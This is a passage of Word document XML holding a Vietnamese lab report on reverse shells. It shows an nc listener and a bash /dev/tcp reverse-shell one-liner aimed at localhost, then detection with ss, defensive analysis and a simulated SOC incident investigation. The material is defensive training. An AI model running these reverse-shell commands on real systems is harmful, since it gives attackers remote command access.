    <w:p w14:paraId="6B2AD4AC" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Mở listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652DB016" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C92186" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Mở terminal mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5317C9E0" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Ctrl + Shift + T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A8790E" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bước 3: Tạo reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438F065" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376B1228" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Kiểm tra connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A45C9A" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ss -antp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA94B8" w14:textId="01B1FB3D" w:rsidR="009670C9" w:rsidRPr="009670C9" w:rsidRDefault="009670C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009670C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24000284" wp14:editId="02979C62">
            <wp:extent cx="5486400" cy="4627245"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="100120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07438" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="4627245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39815224" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Kill process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313912E2" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>kill -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07852D" w14:textId="4A8EEC45" w:rsidR="009670C9" w:rsidRDefault="009670C9">
      <w:r w:rsidRPr="009670C9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680AECFA" wp14:editId="063231D4">
            <wp:extent cx="4858428" cy="1467055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14718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74209" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4858428" cy="1467055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75963FD7" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C0FD9" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Thấy outbound connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98AB4E" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0C75F" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu suspicious connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D610E" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4651E6" w14:textId="77777777" w:rsidR="007C6A8D" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03504520" w14:textId="77777777" w:rsidR="007C6A8D" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t xml:space="preserve">+ Ở góc độ tấn công: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>Lệnh bash -i &gt;&amp; /dev/tcp/127.0.0.1/4444 0&gt;&amp;1 là quan trọng nhất. Đây chính là payload để tạo ra một Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16051C0C" w14:textId="77777777" w:rsidR="007C6A8D" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t xml:space="preserve">+ Ở góc độ phòng thủ: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>Lệnh ss -antp là quan trọng nhất. Nó liệt kê chi tiết các kết nối mạng đang hoạt động, từ đó rà soát và phát hiện những kết nối bất thường đang "tuồn" dữ liệu ra ngoài</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90202A" w14:textId="6532C572" w:rsidR="007C6A8D" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t>Khi chạy lệnh ss -antp, cần chú ý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B59C0A" w14:textId="77777777" w:rsidR="007C6A8D" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>Trạng thái</w:t>
      </w:r>
      <w:r>
        <w:t>: các kết nối có trạng thái ESTAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29811BA6" w14:textId="77777777" w:rsidR="007C6A8D" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>Chiều kết nối: Outbound connection sẽ có Local Address là một port ngẫu nhiên mức cao, kết nối đến Peer Address là một IP và Port lạ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35A92F" w14:textId="77777777" w:rsidR="009B64F5" w:rsidRDefault="007C6A8D">
      <w:r>
        <w:t xml:space="preserve">+ Tiến trình: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>Nếu thấy cột process hiển thị các shell (như bash</w:t>
      </w:r>
      <w:r>
        <w:t>…</w:t>
      </w:r>
      <w:r w:rsidRPr="007C6A8D">
        <w:t>) hoặc các công cụ không được thiết kế cho mạng đang duy trì một kết nối ra bên ngoài, thì hệ thống gần như chắc chắn đã bị xâm nhập bằng Reverse Shell.</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30210BE3" w14:textId="0A70412A" w:rsidR="00C6133F" w:rsidRDefault="009B64F5">
      <w:r w:rsidRPr="009B64F5">
        <w:t xml:space="preserve">Reverse Shell là kỹ thuật sinh ra để vượt qua Firewall. Thông thường, Firewall được cấu hình rất chặt chẽ ở chiều Inbound (chặn người ngoài kết nối vào server), nhưng lại thường thả lỏng ở chiều Outbound (cho phép server thoải mái kết nối ra internet để tải bản cập nhật, gọi API,...). Kẻ tấn công lợi dụng lỗ hổng của một ứng dụng web (ví dụ: lỗi upload file, SQL Injection) để ép máy chủ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chủ động</w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t xml:space="preserve"> tạo kết nối (outbound) ngược về máy của chúng. Một khi kết nối thành công, kẻ tấn công có toàn quyền thực thi lệnh trên máy chủ với quyền của user đang chạy ứng dụng (ở đây là user chạy tiến trình bash)</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D011BD3" w14:textId="7260A0F8" w:rsidR="009B64F5" w:rsidRDefault="009B64F5">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>Kiểm soát Outbound Firewall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>Không bao giờ cấu hình Firewall cho phép server mở mọi kết nối ra internet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>chỉ được phép gọi ra ngoài đến các IP/Domain và Port cụ thể đã được phê duyệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9F63B" w14:textId="79C4CF3F" w:rsidR="009B64F5" w:rsidRDefault="009B64F5">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>Giám sát tại Endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Wazuh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EBEB06" w14:textId="3EBC3FAA" w:rsidR="009B64F5" w:rsidRDefault="009B64F5">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>Triển khai NIDS/NIPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t>Sử dụng các hệ thống như Snort để phân tích gói tin mạng. Vì các Reverse Shell cơ bản</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:t xml:space="preserve">thường truyền dữ liệu dưới dạng plain-text không mã hóa, Snort có thể </w:t>
      </w:r>
      <w:r w:rsidRPr="009B64F5">
        <w:lastRenderedPageBreak/>
        <w:t>dễ dàng bắt được các signature của dòng lệnh Linux chạy qua đường mạng để cảnh báo hoặc drop ngay gói tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792DA73" w14:textId="275B8A36" w:rsidR="009B64F5" w:rsidRDefault="009B64F5">
      <w:r>
        <w:t xml:space="preserve">+ Nguyên tắc đặc quyền tối thiểu: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38A1B3" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Challenge Tổng Hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA021B2" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Dựng một incident gồm:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- CPU cao</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Login fail</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Reverse shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Permission sai</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Sau đó tự điều tra toàn bộ như SOC Analyst.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210DCF4" w14:textId="7472B48D" w:rsidR="005E022B" w:rsidRDefault="005F2C74">
      <w:r w:rsidRPr="005F2C74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8574DD" wp14:editId="059A0D5F">
            <wp:extent cx="5486400" cy="2700655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="37957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78314" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2700655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBCF05" w14:textId="2D06559E" w:rsidR="005F2C74" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:t>Trên Victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F3CB48" w14:textId="2CF06ACE" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E3E3163" wp14:editId="0A142E18">
            <wp:extent cx="4534533" cy="638264"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="174758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5608" name="Picture 1747585608"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4534533" cy="638264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB142D9" w14:textId="4A5C2035" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:t>Trên Attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B2416" w14:textId="7C26FBBD" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E947A11" wp14:editId="5A2D7AD7">
            <wp:extent cx="5486400" cy="1687195"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="991095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95075" name="Picture 991095075"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1687195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4006D2F9" w14:textId="1EFC4A41" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:t>Trên Victim: Kiểm tra log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1439A515" w14:textId="4481ABB0" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DA450FC" wp14:editId="7EDD4ACF">
            <wp:extent cx="5486400" cy="1825625"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="194670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00150" name="Picture 1946700150"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1825625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31145BEB" w14:textId="2B17CCB0" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:t>Trên Attacker, mở cổng 4444 để nhận shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442DAF3" w14:textId="39C92AF3" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r w:rsidRPr="000F0C8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75818776" wp14:editId="0536BC3F">
            <wp:extent cx="3715268" cy="724001"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72852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22502" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3715268" cy="724001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093EDD7" w14:textId="55734219" w:rsidR="000F0C8D" w:rsidRDefault="000F0C8D">
      <w:r>
        <w:t xml:space="preserve">Kích hoạt Reverse shell, </w:t>
      </w:r>
      <w:r w:rsidRPr="000F0C8D">
        <w:t>giả lập việc đã upload thành công một file script và thực thi nó để đẩy shell ngược về Terminal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9F722" w14:textId="7EC0BD28" w:rsidR="000F0C8D" w:rsidRDefault="00380547">
      <w:r w:rsidRPr="00380547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="432591C8" wp14:editId="1C684913">
            <wp:extent cx="5486400" cy="1797685"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176228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80712" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1797685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="054ED9E0" w14:textId="36DE7D57" w:rsidR="00380547" w:rsidRDefault="00380547">
      <w:r>
        <w:t>Attacker gây hết CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64059089" w14:textId="68BE6E77" w:rsidR="00380547" w:rsidRDefault="00380547">
      <w:r w:rsidRPr="00380547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA0CD3B" wp14:editId="36851ED1">
            <wp:extent cx="5486400" cy="3281045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73903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34783" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3281045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B29122" w14:textId="34525005" w:rsidR="003652B6" w:rsidRDefault="003652B6">
      <w:r>
        <w:t>Tìm reverse shell được thiết lập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014DB1DA" w14:textId="622C9931" w:rsidR="00380547" w:rsidRDefault="00380547">
      <w:r w:rsidRPr="00380547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FDCC55" wp14:editId="730127CB">
            <wp:extent cx="5486400" cy="466725"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="203993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38020" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="466725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969F2A5" w14:textId="157F4210" w:rsidR="003652B6" w:rsidRDefault="003652B6">
      <w:r>
        <w:t>Kiểm tra xem attacker có SSH vào được người dùng không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFBD50F" w14:textId="7C3B0FFD" w:rsidR="00380547" w:rsidRDefault="00380547">
      <w:r w:rsidRPr="00380547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E151CD" wp14:editId="08DA4741">
            <wp:extent cx="5486400" cy="832485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="207519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91411" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="832485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A0892" w14:textId="06312AD5" w:rsidR="003652B6" w:rsidRDefault="003652B6">
      <w:r>
        <w:t>Rà quét các thư mục web có quyền nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A7BDA" w14:textId="5C52EE12" w:rsidR="00380547" w:rsidRDefault="00380547">
      <w:r w:rsidRPr="00380547">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7484023A" wp14:editId="0756552C">
            <wp:extent cx="4572638" cy="619211"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11374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66552" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572638" cy="619211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7119A60C" w14:textId="46E5F538" w:rsidR="003652B6" w:rsidRDefault="003652B6">
      <w:r>
        <w:t>Cắt tiến trình ngốn CPU và đường hầm cho reverse shell đi qua, đồng thời thu hồi quyền 777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759126D5" w14:textId="2ED1A90D" w:rsidR="003652B6" w:rsidRDefault="003652B6">
      <w:r w:rsidRPr="003652B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C4F1863" wp14:editId="14BAC6C2">
            <wp:extent cx="5486400" cy="793115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="61630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07199" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="793115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58159AB3" w14:textId="77777777" w:rsidR="005E022B" w:rsidRDefault="005E022B"/>
    <w:sectPr w:rsidR="005E02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6BA078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4943210"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="ListBullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1670520007">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1342469762">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1461652970">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="33238299">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="411708198">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1769958048">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1350329959">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="887957891">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="745954817">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="236284387">
